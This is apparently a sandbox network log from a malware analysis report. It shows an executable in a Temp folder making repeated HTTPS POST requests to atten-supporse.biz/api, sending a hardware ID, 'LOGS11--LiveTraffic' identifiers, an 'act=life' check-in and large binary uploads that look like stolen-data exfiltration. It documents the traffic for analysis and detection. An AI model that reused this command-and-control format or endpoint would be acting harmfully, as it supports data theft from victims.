2024-12-09 07:08:24 UTC	16384	IN	Data Raw: 87 ed a9 a0 74 4b 83 c6 4c dd b7 95 c3 6b 7d ef e3 b5 45 c5 80 b8 d8 ce 6d 35 c2 84 fe b0 18 d0 45 85 d6 1b 42 ca 77 70 6b 28 6f 60 9f e9 90 6d 8a 12 6c 45 7b 29 92 41 a6 d0 ce 6d 06 3e bf 18 14 3e 4c 59 fb c7 1a cc 07 74 48 e1 76 62 5e 94 9a 43 f2 d5 d3 f9 42 4b d9 ab 59 e6 15 fd 39 03 0b 24 39 a1 bd a3 2f 22 ea 73 e9 7e 88 75 6a f2 68 05 6c 46 b8 58 de 2e b2 9a 37 8f 69 f7 f4 85 3e fc 3f 76 2d a4 69 0f d0 14 68 e7 03 4f ec 0f 59 9b 8d 23 b7 b6 41 11 ce 89 7f 68 20 c0 56 c1 42 a8 82 dd d7 dc 6f 30 bf 33 a7 04 5d 92 ac 1d ad a0 c2 7f 22 43 5b e2 4d 75 ba 37 3f ee 50 9a 37 11 c5 b1 41 b4 22 5c 9d bd 50 8c 88 18 49 63 07 0c f5 d1 0d 4a 37 ac eb 81 22 12 5b ad c2 62 20 dc 7c e9 b4 c6 48 b4 12 aa db e7 78 e7 18 e5 ae b2 8c 0b fd 65 81 d6 1f 8a b1 e8 fa 98 df Data Ascii: tKLk}Em5EBwpk(o`mlE{)Am>>LYtHvb^CBKY9$9/"s~ujhlFX.7i>?v-ihOY#Ah VBo03]"C[Mu7?P7A"\PIcJ7"[b \|Hxe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49814	104.21.16.9	443	7172	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:08:26 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AL0LMH5VRNFMOG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18145 Host: atten-supporse.biz
2024-12-09 07:08:26 UTC	15331	OUT	Data Raw: 2d 2d 41 4c 30 4c 4d 48 35 56 52 4e 46 4d 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 32 33 41 45 38 36 45 46 43 45 46 34 34 38 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 41 4c 30 4c 4d 48 35 56 52 4e 46 4d 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 4c 30 4c 4d 48 35 56 52 4e 46 4d 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 41 4c Data Ascii: --AL0LMH5VRNFMOGContent-Disposition: form-data; name="hwid"B823AE86EFCEF44823D904AF30EFEBBC--AL0LMH5VRNFMOGContent-Disposition: form-data; name="pid"2--AL0LMH5VRNFMOGContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--AL
2024-12-09 07:08:26 UTC	2814	OUT	Data Raw: dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
2024-12-09 07:08:27 UTC	1024	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nvtda3p4mo54vcd4osj60970jv; expires=Fri, 04-Apr-2025 00:55:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DzJT%2FUsWm9V4vw%2BtiS%2Fd9xAOBNIecDtSueRieywFjJQOIb5Kpd7lo1CKilU50tsk0TuYe5iyiV%2BVwhpshBsfsViR%2B1Sit027cTsLKf3wPcSZ0KRkhhXnbUQAJ5oS6AaGRAQ4Syo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef329fbbc814210-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1630&rtt_var=612&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19105&delivery_rate=1784841&cwnd=244&unsent_bytes=0&cid=567db90de06c2454&ts=1310&x=0"
2024-12-09 07:08:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 07:08:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49820	104.21.16.9	443	7172	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:08:29 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=V4VSJ73W8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8736 Host: atten-supporse.biz
2024-12-09 07:08:29 UTC	8736	OUT	Data Raw: 2d 2d 56 34 56 53 4a 37 33 57 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 32 33 41 45 38 36 45 46 43 45 46 34 34 38 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 56 34 56 53 4a 37 33 57 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 34 56 53 4a 37 33 57 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 56 34 56 53 4a 37 33 57 38 0d 0a 43 6f 6e 74 65 6e Data Ascii: --V4VSJ73W8Content-Disposition: form-data; name="hwid"B823AE86EFCEF44823D904AF30EFEBBC--V4VSJ73W8Content-Disposition: form-data; name="pid"2--V4VSJ73W8Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--V4VSJ73W8Conten
2024-12-09 07:08:30 UTC	1016	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=19li14g59gsdj0a76f99geigh1; expires=Fri, 04-Apr-2025 00:55:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=daal%2BXlvmPx11pO02jUvxoiUggHtb551N8FhGIAI1c4pYDms1r6VMBwrhcck3yCBZmcDOFTko2P8f5cMUGxnP%2BBCyvgGVF4jieQTcgAOCmjfAYDRZffnVOEBmKUEUeDP5uoEPhA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef32a0c78a84337-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1621&rtt_var=635&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9668&delivery_rate=1688837&cwnd=222&unsent_bytes=0&cid=70efb3f626deb8e4&ts=1021&x=0"
2024-12-09 07:08:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 07:08:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49828	104.21.16.9	443	7172	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:08:31 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QQCK5K5RZQIK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20407 Host: atten-supporse.biz
2024-12-09 07:08:31 UTC	15331	OUT	Data Raw: 2d 2d 51 51 43 4b 35 4b 35 52 5a 51 49 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 32 33 41 45 38 36 45 46 43 45 46 34 34 38 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 51 51 43 4b 35 4b 35 52 5a 51 49 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 51 43 4b 35 4b 35 52 5a 51 49 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 51 51 43 4b 35 4b 35 52 Data Ascii: --QQCK5K5RZQIKContent-Disposition: form-data; name="hwid"B823AE86EFCEF44823D904AF30EFEBBC--QQCK5K5RZQIKContent-Disposition: form-data; name="pid"3--QQCK5K5RZQIKContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--QQCK5K5R
2024-12-09 07:08:31 UTC	5076	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-09 07:08:32 UTC	1024	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=knokcrjdnmi1bs9eo6f5cpcl7c; expires=Fri, 04-Apr-2025 00:55:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNzjyt1XBOKUlrMKh%2BtNCNtd81aGENOR1%2B2MCY%2F3YG8%2F2f8niBR7RV5aFGzsIMOj5%2FyYhioZynLpwwsS8ELcEjB99R2Bc6EOhniulEkI4QUEj0i9qkYNuBpdsOBhKqYerU7Al8g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef32a1c6a168c3f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4787&min_rtt=2008&rtt_var=2610&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21365&delivery_rate=1454183&cwnd=226&unsent_bytes=0&cid=1cf68b15a7ad5560&ts=948&x=0"
2024-12-09 07:08:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 07:08:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49840	104.21.16.9	443	7172	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:08:34 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JJJFIE3GQQIZY9BFFP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1299 Host: atten-supporse.biz
2024-12-09 07:08:34 UTC	1299	OUT	Data Raw: 2d 2d 4a 4a 4a 46 49 45 33 47 51 51 49 5a 59 39 42 46 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 32 33 41 45 38 36 45 46 43 45 46 34 34 38 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4a 4a 4a 46 49 45 33 47 51 51 49 5a 59 39 42 46 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 4a 4a 46 49 45 33 47 51 51 49 5a 59 39 42 46 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 Data Ascii: --JJJFIE3GQQIZY9BFFPContent-Disposition: form-data; name="hwid"B823AE86EFCEF44823D904AF30EFEBBC--JJJFIE3GQQIZY9BFFPContent-Disposition: form-data; name="pid"1--JJJFIE3GQQIZY9BFFPContent-Disposition: form-data; name="lid"LOGS11--LiveT
2024-12-09 07:08:35 UTC	1018	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8g3soj3tvu15fdfe2ii0jnk0bq; expires=Fri, 04-Apr-2025 00:55:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hs1%2BBnIsl7FLJwP3qROXvbrjOde9o1f3wHz5IhWEsdKfbQK9p7aeNnyi1mPENlzb7ba%2Fy%2F1Ijx9%2BMsiviPZAdoI4lcmQQOWP9uGEEU7CGx405dWqKb0O8qnvQ5Owalk3XTGz4eo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef32a2d9f6a424a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=2027&rtt_var=781&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2218&delivery_rate=1382575&cwnd=252&unsent_bytes=0&cid=47ea8916e2156327&ts=739&x=0"
2024-12-09 07:08:35 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 07:08:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49845	104.21.16.9	443	7588	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:08:36 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-09 07:08:36 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-09 07:08:38 UTC	1024	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2ejojddhmb91muh7k52o5p9c46; expires=Fri, 04-Apr-2025 00:55:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iR%2BVRrCHLvyCvSR0Eeqw54%2ByZ33caz%2B%2FDRP2NlNsy5BMnQN6t5Y%2BF9jIzmhN2i9ZFVrzCOkUGjCQTI2LdgefEuF4ddO2uOPnG0W8wkyORopw7VYoEtAOGYVAv2me%2F7a%2FcwZQmW4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef32a3b3a5bc339-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1658&rtt_var=625&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1746411&cwnd=247&unsent_bytes=0&cid=dd6c6af388980f02&ts=1494&x=0"
2024-12-09 07:08:38 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-09 07:08:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49847	104.21.16.9	443	7172	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:08:37 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=EP7UPWHG155CJ2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 580374 Host: atten-supporse.biz
2024-12-09 07:08:37 UTC	15331	OUT	Data Raw: 2d 2d 45 50 37 55 50 57 48 47 31 35 35 43 4a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 32 33 41 45 38 36 45 46 43 45 46 34 34 38 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 45 50 37 55 50 57 48 47 31 35 35 43 4a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 50 37 55 50 57 48 47 31 35 35 43 4a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 45 50 Data Ascii: --EP7UPWHG155CJ2Content-Disposition: form-data; name="hwid"B823AE86EFCEF44823D904AF30EFEBBC--EP7UPWHG155CJ2Content-Disposition: form-data; name="pid"1--EP7UPWHG155CJ2Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--EP
2024-12-09 07:08:37 UTC	15331	OUT	Data Raw: 51 7e 35 7e d0 65 39 a6 a2 f5 95 bb b1 19 22 b1 d6 37 25 0a 15 b2 d0 73 68 5f de 57 52 36 c2 a9 df 1c 12 58 3f cd 55 99 29 5f b7 8b db 7b 27 a8 e9 63 32 1b d2 61 96 b9 2b 2b db bb e9 16 48 20 cc 22 47 18 01 83 08 ba 35 26 95 61 55 20 c1 fc 25 d9 be 7c d8 6f f1 5b 38 b2 74 44 7d 5d f5 53 40 47 05 d0 18 e5 f5 4a 69 42 dc 56 5d ea 6c 72 bb 90 d2 a8 cf 6a b5 76 93 ad 2b 6f 1b 55 86 2a 9d 0e 7b b1 05 a7 8c e2 d7 0f ed 19 6f 25 1b bc ad 4c 22 9d be f4 bc 82 9b d7 82 02 05 87 f6 9d a4 e4 2f db 3b d3 25 a1 3b 7a 85 ef c0 52 87 84 8a 2f 16 18 8b 29 87 b4 65 f8 37 fd 2e 7d 26 f7 81 93 70 c2 0c 99 78 e5 9c 6e c7 91 68 1d b8 26 e0 e6 50 4d 4d b0 9e cf 1f f2 76 95 44 c6 5f 25 1d 04 fa f5 68 ca 5d 88 9c d1 08 37 49 82 74 47 1e c0 bf c1 bb 54 c0 c5 32 dc 3d 77 76 a3 67 Data Ascii: Q~5~e9"7%sh_WR6X?U)_{'c2a++H "G5&aU %\|o[8tD}]S@GJiBV]lrjv+oU*{o%L"/;%;zR/)e7.}&pxnh&PMMvD_%h]7ItGT2=wvg
2024-12-09 07:08:37 UTC	15331	OUT	Data Raw: 40 ba cd e9 48 9b a8 70 da 99 b9 b8 30 91 76 d3 bf 6c 70 3d 58 6b 76 68 fb 67 44 78 1e 8a 32 f3 44 8a f6 6b 9f c3 0c 27 5a b0 63 fa 37 5f 55 02 0a 68 af 8c a4 25 6c ab 44 d2 da 9f ca c2 d4 15 89 90 8c eb 47 bf 02 56 43 9f 8b 16 6c ab 11 db c5 9f 7c 1e f7 21 d1 c0 f3 5f 88 7e 89 9d 67 88 06 aa dd 7c ad 7d f0 20 17 ac b6 d1 c3 0f 7a 63 98 4c c0 48 45 86 0d e9 ff 3d 51 0c d1 3b 7c 18 a1 ff bb 85 ab 9d 00 5d 1c ef 5e 92 f4 a7 4f a1 a5 dd 51 00 da 9c fa a3 0f fe f5 63 75 7d c0 ac 0c 22 f3 f8 ce 11 e2 41 f0 6c 97 ea 9f 0d f6 68 57 e7 5a 1e ac 1d 04 97 13 80 f9 c5 2c 5d ac f3 7d 27 84 c7 96 65 3e 82 bd e4 4e 50 2e 03 d5 4c fe 03 4b 48 42 ca 4b e9 40 1b 68 b2 6d c5 b2 4c e1 bc df 12 e1 a8 d5 27 3a c0 59 90 c1 e6 fa 1e 04 17 ed 26 c6 2e 18 ea b2 c4 d1 fb 90 1c c1 Data Ascii: @Hp0vlp=XkvhgDx2Dk'Zc7_Uh%lDGVCl\|!_~g\|} zcLHE=Q;\|]^OQcu}"AlhWZ,]}'e>NP.LKHBK@hmL':Y&.
2024-12-09 07:08:37 UTC	15331	OUT	Data Raw: 58 5c ea a9 fc fa 10 b5 18 58 ee 54 c6 21 0e fd d8 8a 4c 25 10 e9 93 bb f6 bb f9 e7 69 00 cc 57 2b 8f 93 98 5e bc cc a0 b1 4f e5 7e 8d 65 4d 0a f4 59 09 d5 8d 25 e6 d0 b5 6f ab 4e 06 43 92 9d df ba d4 ef f7 2b 7d 36 2d 15 0e 52 e2 bd 4e 9e 60 f2 2c 5b 48 7a fb 6b 84 ba 46 15 fe d1 96 e1 a9 f4 f8 44 d2 ce dc 94 c4 8a 0d ef 45 7a 2a 9c d7 5c ad b7 92 05 35 1d d2 27 ca 90 e8 59 30 b8 f2 61 bd 7c 6c 49 d8 08 5f f7 34 cd fa 65 88 2c a4 4a 91 0b 51 9f df 70 32 a5 f3 5e 6c 20 6e 15 0e ab c8 87 87 87 93 7b 84 61 b8 14 97 2d 9e 23 36 47 cf 40 3f 66 7e 2c 09 c0 a2 d9 87 63 d4 83 4e 66 e0 26 26 22 f4 a3 dc fe fe f9 66 11 0b a6 8c 1a 25 26 7e 30 3c 0c 38 d8 d7 b4 f7 8c 6c 7e 53 a8 2b 0b 30 82 fb a6 f2 5e 8c 87 81 15 db ca 5e 39 0c d6 31 16 77 ed 2f 59 61 d3 11 69 2e Data Ascii: X\XT!L%iW+^O~eMY%oNC+}6-RN`,[HzkFDEz*\5'Y0a\|lI_4e,JQp2^l n{a-#6G@?f~,cNf&&"f%&~0<8l~S+0^^91w/Yai.
2024-12-09 07:08:37 UTC	15331	OUT	Data Raw: 47 80 5b fc b2 eb ff d6 0d 13 58 09 a9 08 d0 84 18 92 e0 9f 68 31 57 bd 4f f9 c9 aa a8 59 de 36 6b 84 71 81 4e 8c db d3 b5 3c 71 16 f7 20 b3 b0 1f 1b eb cd 72 31 1c 22 6a 60 0d a4 57 f2 2c 14 fb 17 89 25 4e f1 f0 7c f8 2b 25 13 99 f5 bb d2 af c0 c6 62 91 8f 5f f7 ed 50 54 eb 55 34 11 03 be 72 d5 bd f2 6f a3 1b 98 47 c8 c2 70 3d 42 c8 9b 0e 69 1a 4c 3d 6e 8a 5a 59 af 1b c7 36 ae 46 bb 1e 12 83 d9 cf 9b 8d 53 90 01 48 2f 56 6d 50 3c 93 78 14 e3 e6 38 18 c2 c1 e1 85 b7 08 9f c1 1e 68 36 15 49 7f 52 40 0c d1 63 a1 af ea 99 c3 b9 bf 4b 19 45 30 73 19 1b eb f1 bc 12 94 00 cf a9 eb 17 89 d9 ac 7a 6c 53 b7 27 ad 05 d3 f9 1a aa 9a 97 75 f0 66 65 86 74 c9 fd 14 2c 2c b5 3e d0 85 3d b2 04 20 f6 9f 5a fc 0c e2 a7 dc f6 74 93 11 98 ad 2c 93 78 62 9c 12 13 e7 85 3c 35 Data Ascii: G[Xh1WOY6kqN<q r1"j`W,%N\|+%b_PTU4roGp=BiL=nZY6FSH/VmP<x8h6IR@cKE0szlS'ufet,,>= Zt,xb<5
